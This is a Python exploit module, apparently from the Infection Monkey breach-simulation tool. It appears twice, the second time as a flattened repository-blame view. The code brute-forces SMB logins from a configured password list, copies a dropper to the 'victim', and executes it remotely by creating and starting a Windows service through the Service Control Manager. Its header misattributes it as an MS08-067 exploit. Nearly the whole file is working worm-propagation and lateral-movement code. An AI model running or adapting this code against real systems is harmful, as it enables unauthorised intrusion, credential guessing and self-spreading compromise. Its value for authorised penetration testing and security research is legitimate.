monkey/chaos_monkey/exploit/smbexec.py

#!/usr/bin/env python
#############################################################################
#  MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
#  www.hackingspirits.com
#  www.coffeeandsecurity.com
#  Email: d3basis.m0hanty @ gmail.com
#############################################################################

import sys
from logging import getLogger
from model.host import VictimHost
from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED
from exploit import HostExploiter
from exploit.tools import SmbTools

try:
    from impacket import smb
    from impacket import uuid
    from impacket.dcerpc import dcerpc
    from impacket.dcerpc.v5 import transport, scmr
    from impacket.smbconnection import SessionError as SessionError1, SMB_DIALECT
    from impacket.smb import SessionError as SessionError2
    from impacket.smb3 import SessionError as SessionError3
except ImportError, exc:
    print str(exc)
    print 'Install the following library to make this script work'
    print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
    print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
    sys.exit(1)


LOG = getLogger(__name__)

class SmbExploiter(HostExploiter):
    KNOWN_PROTOCOLS = {
        '139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),
        '445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),
        }
    USE_KERBEROS = False

    def __init__(self):
        self._config = __import__('config').WormConfiguration

    def exploit_host(self, host, src_path):
        assert isinstance(host, VictimHost)

        passwords = list(self._config.psexec_passwords[:])
        known_password = host.get_credentials(self._config.psexec_user)
        if known_password is not None:
            if known_password in passwords:
                passwords.remove(known_password)
            passwords.insert(0, known_password)

        exploited = False
        for password in passwords:
            try:
                # copy the file remotely using SMB
                remote_full_path = SmbTools.copy_file(host,
                                              self._config.psexec_user,
                                              password,
                                              src_path,
                                              self._config.dropper_target_path)

                if remote_full_path is not None:
                    LOG.debug("Successfully logged in %r using SMB (%s : %s)",
                              host, self._config.psexec_user, password)
                    host.learn_credentials(self._config.psexec_user, password)
                    exploited = True
                    break

            except Exception, exc:
                LOG.debug("Error logging into victim %r with user"
                          " %s and password '%s': (%s)", host,
                          self._config.psexec_user, password, exc)
                continue

        if not exploited:
            LOG.debug("Exploiter SmbExec is giving up...")
            return False

        # execute the remote dropper in case the path isn't final
        if remote_full_path.lower() != self._config.dropper_target_path.lower():
            cmdline = DROPPER_CMDLINE_DETACHED % {'dropper_path': remote_full_path}
        else:
            cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path}

        for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():
            rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))
            rpctransport.set_dport(port)

            if hasattr(rpctransport,'preferred_dialect'):
               rpctransport.preferred_dialect(SMB_DIALECT)
            if hasattr(rpctransport, 'set_credentials'):
                # This method exists only for selected protocol sequences.
                rpctransport.set_credentials(self._config.psexec_user, password, host.ip_addr,
                                             "", "", None)
            rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)

            scmr_rpc = rpctransport.get_dce_rpc()

            try:
                scmr_rpc.connect()
            except Exception, exc:
                LOG.warn("Error connecting to SCM on exploited machine %r: %s",
                         host, exc)
                return False

            smb_conn = rpctransport.get_smb_connection()

        # We don't wanna deal with timeouts from now on.
        smb_conn.setTimeout(100000)
        scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)
        resp = scmr.hROpenSCManagerW(scmr_rpc)
        sc_handle = resp['lpScHandle']

        # start the monkey using the SCM
        resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, "Chaos Monkey", "Chaos Monkey",
                                     lpBinaryPathName=cmdline)
        service = resp['lpServiceHandle']

        try:
           scmr.hRStartServiceW(scmr_rpc, service)
        except:
           pass
        scmr.hRDeleteService(scmr_rpc, service)
        scmr.hRCloseServiceHandle(scmr_rpc, service)

        LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
                 remote_full_path, host, cmdline)

        return True
first commit 2015-08-30 15:27:35 +08:00			`#!/usr/bin/env python`
			`#############################################################################`
			`# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)`
			`# www.hackingspirits.com`
			`# www.coffeeandsecurity.com`
			`# Email: d3basis.m0hanty @ gmail.com`
			`#############################################################################`

			`import sys`
			`from logging import getLogger`
			`from model.host import VictimHost`
			`from model import MONKEY_CMDLINE_DETACHED, DROPPER_CMDLINE_DETACHED`
			`from exploit import HostExploiter`
			`from exploit.tools import SmbTools`

			`try:`
			`from impacket import smb`
			`from impacket import uuid`
			`from impacket.dcerpc import dcerpc`
			`from impacket.dcerpc.v5 import transport, scmr`
			`from impacket.smbconnection import SessionError as SessionError1, SMB_DIALECT`
			`from impacket.smb import SessionError as SessionError2`
			`from impacket.smb3 import SessionError as SessionError3`
			`except ImportError, exc:`
			`print str(exc)`
			`print 'Install the following library to make this script work'`
			`print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'`
			`print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'`
			`sys.exit(1)`


			`LOG = getLogger(__name__)`

			`class SmbExploiter(HostExploiter):`
			`KNOWN_PROTOCOLS = {`
			`'139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139),`
			`'445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445),`
			`}`
			`USE_KERBEROS = False`

			`def __init__(self):`
			`self._config = __import__('config').WormConfiguration`

			`def exploit_host(self, host, src_path):`
			`assert isinstance(host, VictimHost)`

			`passwords = list(self._config.psexec_passwords[:])`
			`known_password = host.get_credentials(self._config.psexec_user)`
			`if known_password is not None:`
			`if known_password in passwords:`
			`passwords.remove(known_password)`
			`passwords.insert(0, known_password)`

			`exploited = False`
			`for password in passwords:`
			`try:`
			`# copy the file remotely using SMB`
			`remote_full_path = SmbTools.copy_file(host,`
			`self._config.psexec_user,`
			`password,`
			`src_path,`
			`self._config.dropper_target_path)`

			`if remote_full_path is not None:`
			`LOG.debug("Successfully logged in %r using SMB (%s : %s)",`
			`host, self._config.psexec_user, password)`
			`host.learn_credentials(self._config.psexec_user, password)`
			`exploited = True`
			`break`

			`except Exception, exc:`
			`LOG.debug("Error logging into victim %r with user"`
			`" %s and password '%s': (%s)", host,`
			`self._config.psexec_user, password, exc)`
			`continue`

			`if not exploited:`
			`LOG.debug("Exploiter SmbExec is giving up...")`
			`return False`

			`# execute the remote dropper in case the path isn't final`
			`if remote_full_path.lower() != self._config.dropper_target_path.lower():`
			`cmdline = DROPPER_CMDLINE_DETACHED % {'dropper_path': remote_full_path}`
			`else:`
			`cmdline = MONKEY_CMDLINE_DETACHED % {'monkey_path': remote_full_path}`

			`for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values():`
			`rpctransport = transport.DCERPCTransportFactory(str_bind_format % (host.ip_addr, ))`
			`rpctransport.set_dport(port)`

			`if hasattr(rpctransport,'preferred_dialect'):`
			`rpctransport.preferred_dialect(SMB_DIALECT)`
			`if hasattr(rpctransport, 'set_credentials'):`
			`# This method exists only for selected protocol sequences.`
			`rpctransport.set_credentials(self._config.psexec_user, password, host.ip_addr,`
			`"", "", None)`
			`rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS)`

			`scmr_rpc = rpctransport.get_dce_rpc()`

			`try:`
			`scmr_rpc.connect()`
			`except Exception, exc:`
			`LOG.warn("Error connecting to SCM on exploited machine %r: %s",`
			`host, exc)`
			`return False`

			`smb_conn = rpctransport.get_smb_connection()`

			`# We don't wanna deal with timeouts from now on.`
			`smb_conn.setTimeout(100000)`
			`scmr_rpc.bind(scmr.MSRPC_UUID_SCMR)`
			`resp = scmr.hROpenSCManagerW(scmr_rpc)`
			`sc_handle = resp['lpScHandle']`

			`# start the monkey using the SCM`
			`resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, "Chaos Monkey", "Chaos Monkey",`
			`lpBinaryPathName=cmdline)`
			`service = resp['lpServiceHandle']`

			`try:`
			`scmr.hRStartServiceW(scmr_rpc, service)`
			`except:`
			`pass`
			`scmr.hRDeleteService(scmr_rpc, service)`
			`scmr.hRCloseServiceHandle(scmr_rpc, service)`

			`LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",`
			`remote_full_path, host, cmdline)`

			`return True`